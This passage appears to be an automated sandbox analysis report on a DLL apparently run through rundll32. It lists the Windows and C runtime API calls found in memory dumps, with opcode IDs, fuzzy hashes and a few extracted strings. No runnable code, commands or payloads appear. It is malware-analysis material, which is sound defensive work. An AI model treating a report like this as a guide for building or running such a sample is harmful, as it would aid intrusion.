                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                    • Opcode ID: 07c9cf363763da66658bcf77173329d6f0d4bd850e73f1dc08a629a5282fb962
                                                                                                                                                                                                                    • Instruction ID: d8f56ea4ae7bdcb45d9984ccb54ba6a2208624f5fb1b2b75f30b5ac950cf1c35
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07c9cf363763da66658bcf77173329d6f0d4bd850e73f1dc08a629a5282fb962
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AF0A4B1A0051DBBDF149F90C80CBAEBFB5FF06326F004065E805A2540DF709960CE90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F227F9C: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F227FCE
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F229DD1
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F229DE8
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F229E07
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F229E22
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F229E39
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$AllocateHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3033488037-0
                                                                                                                                                                                                                    • Opcode ID: 65d7656eb3e57675d8a45274ecb586e5c6b3ce6bb9422f52c6db91244e90e4f6
                                                                                                                                                                                                                    • Instruction ID: 3014d17c49f95c42ea24143205b2b358d800a31c4fe4072c4af6fa58b27fcf37
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65d7656eb3e57675d8a45274ecb586e5c6b3ce6bb9422f52c6db91244e90e4f6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB51A272A04709AFD711DF69CC80BAA77F4EF49725F10066AE809DB694E731E910DF50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PdhRemoveCounter.PDH(?,A9775A74,?,?,00000000,6F238180,000000FF,?,6F2107EE,00000000), ref: 6F2133C4
                                                                                                                                                                                                                    • PdhCloseQuery.PDH(?,A9775A74,?,?,00000000,6F238180,000000FF,?,6F2107EE,00000000), ref: 6F2133DA
                                                                                                                                                                                                                    • PdhOpenQueryW.PDH(00000000,00000000,00000000), ref: 6F213404
                                                                                                                                                                                                                    • PdhValidatePathW.PDH(?), ref: 6F213467
                                                                                                                                                                                                                    • PdhAddCounterW.PDH(00000000,?,00000000,?), ref: 6F21348E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CounterQuery$CloseOpenPathRemoveValidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 698537007-0
                                                                                                                                                                                                                    • Opcode ID: 664fdaca9ca7032add78b8c2e636f3656b68578b8a8f29c81fb32122a3437b32
                                                                                                                                                                                                                    • Instruction ID: d2680ccf24be62dcefc1ce1f244c39657326be9dea81a6eb9bb05bbe7b3f1fe6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 664fdaca9ca7032add78b8c2e636f3656b68578b8a8f29c81fb32122a3437b32
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5751AE72904649ABDB20CF14C845BDAF7B9FF05710F0082A6E659EB680DB74BE90CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6F207855
                                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6F207889
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32(?,6F2067DC,74780DE0), ref: 6F2078BF
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,6F2067DC,74780DE0), ref: 6F207906
                                                                                                                                                                                                                    • GetCursor.USER32(A9775A74,00000000,0000005F,00000000,00000003,0B8FEA98,00000000,?,6F2067DC,74780DE0), ref: 6F207960
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardCurrentCursorOpenProcessWindow__aulldiv__aullrem
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 265221378-0
                                                                                                                                                                                                                    • Opcode ID: a4640ee04f703a61c209206cfddf59f44a607bc709c99f18f47c9ff0849a9e75
                                                                                                                                                                                                                    • Instruction ID: 61476782416e1f3958e902fc6c6e326b2769b033467f46db3da05ffb2b1af1c2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4640ee04f703a61c209206cfddf59f44a607bc709c99f18f47c9ff0849a9e75
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1417077E1074E5AEB04E67A88C1A6DB7679FDB255F24C72A9800E75C0EB70B8908F40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F204CC6
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F204CE6
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F204D06
                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6F204DA1
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F204DB9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 459529453-0
                                                                                                                                                                                                                    • Opcode ID: 11302a50c6f6d287947df4115df44121987ff30e0fb3d6613a3d372cbc88c43c
                                                                                                                                                                                                                    • Instruction ID: b6716cee6766cef20aac4a0ed5f75c9899bd0bb59b393c109b0709988adac32a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11302a50c6f6d287947df4115df44121987ff30e0fb3d6613a3d372cbc88c43c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4841BBB2904619CBCB14EF98C584B9ABBF4FF15724F1081AED806AB680DB71B905CFC1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6F24BA20), ref: 6F21219C
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6F2121AC
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6F24BA20), ref: 6F2121C9
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6F24BA20), ref: 6F2121ED
                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00000000), ref: 6F212239
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$CurrentEnterLongThreadWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4199534935-0
                                                                                                                                                                                                                    • Opcode ID: 675b552fcd49920bf1ce3da4a10e976e414c0d539a465d62de6c804f6a244631
                                                                                                                                                                                                                    • Instruction ID: 2cc38000854ed7061ba295707e723934e215587871bd308a32af5549a339e5b8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 675b552fcd49920bf1ce3da4a10e976e414c0d539a465d62de6c804f6a244631
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1221A4B2A0862A9BD724DF75DC4885B7BB9EF863713104516FA09CB681DB70E460CFA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 6F22C033
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F22C056
                                                                                                                                                                                                                      • Part of subcall function 6F227F9C: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F227FCE
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6F22C07C
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22C08F
                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F22C09E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                                                    • Opcode ID: 28e7285eb75f5a18429c82e21549bb92c345082198a8a7378454bbc46fc5d325
                                                                                                                                                                                                                    • Instruction ID: bc3d61662cde6df23f7d19eb9dd64cef4e08bb8b4539310aa2a8b442b956cb8a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28e7285eb75f5a18429c82e21549bb92c345082198a8a7378454bbc46fc5d325
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D01B5B3645B19BF673106BA4C8CDBB3AADDAC3E713100219F914D2140DF60DE11C9B0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000103,00000103,00000105,6F2248E3,6F227FDF,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103), ref: 6F22875F
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F228785
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2287C5
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2287F8
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000103,000000FF), ref: 6F228805
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                    • Opcode ID: 3b8eec6110869d433b85258be5bc3f8b1e719eb4d7cef870b49bb575f4ffeca3
                                                                                                                                                                                                                    • Instruction ID: 3203593c19251940a993d79b9656f8d2d33e6131251d0753ee1152f37ffb5222
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b8eec6110869d433b85258be5bc3f8b1e719eb4d7cef870b49bb575f4ffeca3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C11A57718CA0D77DB0126398C88D9F36EDBB827797250326F528A39C0EF65D825DD21
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,03496498,00000000), ref: 6F228610
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F228667
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22869B
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,03496498,00000000), ref: 6F2286A8
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F22CF3F,00000000,00000000,?,03496498,00000000), ref: 6F2286B4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                    • Opcode ID: 3c68230f618ca2bfa7955e60b27b8145e046471a0042ccfa2a51f4e012885c06
                                                                                                                                                                                                                    • Instruction ID: 9df8937f47f571934ea1245f2ce57acb58c5afeae40f55a30cb729b6f0b6be51
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c68230f618ca2bfa7955e60b27b8145e046471a0042ccfa2a51f4e012885c06
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A11A93214CA0D6BCB012639DE08EBE32E9BB83B79B140316F438A69C0EF65C525CD24
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F232B86
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: HeapFree.KERNEL32(00000000,00000000,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?), ref: 6F227F78
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: GetLastError.KERNEL32(?,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?,?), ref: 6F227F8A
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F232B98
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F232BAA
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F232BBC
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F232BCE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                    • Opcode ID: d1c65b10ef5cf74be160ce8789b0a034de6ae0c9d2a8de6a9c58c943343a5cea
                                                                                                                                                                                                                    • Instruction ID: b29cec8e65859ad18d14de4d8ccf67ab214df78504927474c958bd14f5f94a14
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1c65b10ef5cf74be160ce8789b0a034de6ae0c9d2a8de6a9c58c943343a5cea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAF062F290C72DD78A14EE68D088D5B73EAEA00B213505806F038D7E80C730F9848EE0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: g"o
                                                                                                                                                                                                                    • API String ID: 0-477685306
                                                                                                                                                                                                                    • Opcode ID: 2a0c7596818536f0ec1417b3d564cf8b3fc3991bda4d2d31c75cf2debecb1bfd
                                                                                                                                                                                                                    • Instruction ID: 9d15212bbb2df3aa43ca5353308f72bfd491e279b3919b159250f34156ae986b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a0c7596818536f0ec1417b3d564cf8b3fc3991bda4d2d31c75cf2debecb1bfd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A361AE71A24A0EABDB00DBB8C940BEE77F9AF0A315F404151E410BB591E770AA51DF62
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22B8FA: GetOEMCP.KERNEL32(00000000,6F22BB81,?,zO"o,6F24D0FC,6F24D0FC,6F224F7A), ref: 6F22B925
                                                                                                                                                                                                                    • GetACP.KERNEL32(00000000,?,?,?,zO"o,6F22BBC8,?,00000000,?,?,?,?,?,?,6F24D0FC,6F224F7A), ref: 6F22BDDE
                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,zO"o,6F22BBC8,?,00000000,?,?,?,?,?,?,6F24D0FC), ref: 6F22BDF0
                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,6F22BBC8,?,zO"o,6F22BBC8,?,00000000,?,?,?,?,?,?,6F24D0FC,6F224F7A), ref: 6F22BE03
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                                                                    • String ID: zO"o
                                                                                                                                                                                                                    • API String ID: 546120528-616525808
                                                                                                                                                                                                                    • Opcode ID: c52727ba5e65ff6b82b3f6ca8cb4f5b8511b67813b4f753e037d09db664a3e7a
                                                                                                                                                                                                                    • Instruction ID: 550795e8771829ec23ac1238fa665bfaac92eb15f20f19a7f9bd1093f2e8434f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c52727ba5e65ff6b82b3f6ca8cb4f5b8511b67813b4f753e037d09db664a3e7a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2651757090434E8FDB20CF35C890AEABBFAEF02314F50416EE1A98B591D775A545CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6F22F301
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000), ref: 6F22F30D
                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6F22F314
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                                                                                                                                                                    • String ID: Tm"o
                                                                                                                                                                                                                    • API String ID: 2434981716-1604003187
                                                                                                                                                                                                                    • Opcode ID: 2af83784318a733313daccff75241479feba98bf2e23006fe34455ee1d2c6734
                                                                                                                                                                                                                    • Instruction ID: 0f7ecf8afc1ae9b92fff172fa50fa87dd9270cbf95c02c2537569676dfe81426
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2af83784318a733313daccff75241479feba98bf2e23006fe34455ee1d2c6734
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F341547571829DAFDB11CF68C980AAA7FE5FF47314F14439AE8849B642D770A821CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    • API String ID: 0-2837366778
                                                                                                                                                                                                                    • Opcode ID: fa109614b91723c92a4e19e7525db1da9e3047296da335304c79ba2b5ef48149
                                                                                                                                                                                                                    • Instruction ID: 038f365c61de5930b9d16d15429f232cd9235c3ee49f85be4a0c1c293ce4f2fa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa109614b91723c92a4e19e7525db1da9e3047296da335304c79ba2b5ef48149
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC41B071A0461EABCB11DF9DCC85D9EBBF9EF8A310F50806AE804A7640D7B09B40CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F21A129
                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 6F21A20F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CatchEncodePointer
                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                    • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                    • Opcode ID: 18e10770b472b060085691d59ab487dca8f967720f787f1e46b6a47d84e502a7
                                                                                                                                                                                                                    • Instruction ID: 362c84faa81cdc4ed13b0c36616e4a22ce046a6e62c97b835ed4fb071c51fa41
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18e10770b472b060085691d59ab487dca8f967720f787f1e46b6a47d84e502a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D41587190420EAFDF02CF98C880AEE7BF5BF48305F148199EA04A6250D336A961DF54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6F20254F
                                                                                                                                                                                                                      • Part of subcall function 6F2182AE: RaiseException.KERNEL32(E06D7363,00000001,00000003,000000FF,00000000,24448D6F,6F2151E0,000000FF,6F24874C,?,000000FF,?,24448D6F), ref: 6F21830E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
